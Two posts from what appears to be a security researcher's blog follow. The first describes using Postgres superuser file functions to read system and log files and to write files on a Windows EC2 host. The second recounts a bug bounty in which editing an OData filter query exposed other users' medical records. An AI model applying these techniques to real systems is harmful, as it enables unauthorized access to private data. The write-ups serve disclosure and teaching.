Saturday, April 18, 2026

Post-Exploitation on Windows EC2

After elevating your privileges to a database superuser on a remote server on a Windows EC2, you may find yourself looking to see where you are and what host you are on (depending on the path taken to get to the server!) Unfortunately, if you only have limited remote read/write (such as in this situation) without full remote code execution, interacting with an ephemeral file system can be difficult. But as a superuser, you likely have permission to use pg_catalog.pg_file_write(), pg_ls_dir() and/or pg_read_file(). So what areas of the file system can we read and write in as an attacker?

It depends on a few layers of permissions, between the Postgres instance, Windows, and EC2, but the traditional C:\Windows\win.ini is a great test to start with. Once that was successful, I started using pg_ls_dir to list directories under the different C:\Users. If none can be accessed, try C:\ProgramData.

 Sometimes ACLs do weird things to EC2-specific directories. For example, I couldn't read logs under this directory:

C:\ProgramData\Amazon\EC2-Windows\Launch 

 However, I was able to read logs under:

 C:\ProgramData\Amazon\Inspector\Logs 

 Those logs contained the information I was looking for (the first line of each of the logs had the host name, EC2-AMAZ...). Additionally, I was able to write files to C:\ProgramData as well. Temp directories didn't seem to work as well.

Your mileage may vary, but these are some of the low-level permission locations that are likely available to the Postgres process that Claude helped enumerate as a starting point.

  

Sunday, April 5, 2026

Bug Bounties: 150% Perspiration and 30000% Persuasion

Sometimes you need a combination of persuasive and technical writing in the lovely land of bug bounty hunting.

Recently, I found and exploited a particularly juicy Broken Object Authorization issue in a web app which led to a sensitive data dump (including medical data).

Intended Use Case:

Users are allowed to view their records as long as they provide their last name and "secret number". For example, a normal use case might be a user entering "MacDonald" and "12345". If they don't provide the name, they receive an error that both fields are required. Likewise, if they only provide a number? Again, they receive an error.

The API transactions can be viewed by pausing the traffic in BurpSuite intercept, which looks something like:

 /_api/web/lists/GetByTitle('_GET_THE_GOODS')/items?$filter=ID_NUM%20eq%20%2712345%27%20and%20NAME_LAST%20eq%20%27MacDonald%27

To me, that looks a whole lot like an OData query that is being used to control access to the records! 

Unintended Use Case: 

So, naturally, I paused the traffic and use something like a wildcard to see if I can return everything without the "required" number and last name... but the site couldn't return the data, or it was going too slowly. NOTE: be cautious about how you test wildcards in order to not accidentally DoS a web application! 

For the proof-of-concept,  I had to strategize: 1.) make sure I wasn't DoSing them by asking for to many records, and 2.) consider privacy and keep the exfiltrated to a minimum as part of responsible disclosure of vulnerabilities. So instead of a true wildcard in all fields (or removing all search clauses altogether), I used a common last name and removed ID_NUM field.

 /_api/web/lists/GetByTitle('_GET_THE_GOODS')/items?$filter=NAME_LAST%20eq%20%27MacDonald%27 

Success! It returned many different records for the given name, all associated with different reference numbers. It seemed like a cut and dry proof-of-concept...

Or Was It...

I wrote up the report, but unfortunately limiting the scope of my data dump caused a bit of confusion. They wanted to know "how I had gotten the reference number and name". I didn't. I explained again how the attack worked. So then they asked for a video. It still wasn't clear to them. Here, I started to question if my report was clear as mud. All the wording looked good, clear and reproducible step-by-step, so I exfiltrated a little more (again, very minimally to protect the innocent here), just enough to show that it could be any name or any number. Finally two months later, they understood the issue and acknowledged the exploit. 

Unfortunately, instead of fixing the app (which likely would have required quite a lot of architecture-level redesign from what I'd seen), they decided to remove the functionality (at least for now). As of today, the look-up process is now done by emailing a human instead. I'm a big fan of automation wherever possible though, so I'm hoping that's the short-term "bandaid" ahead of an long-term deep architecture redesign. 

Happy hacking, all!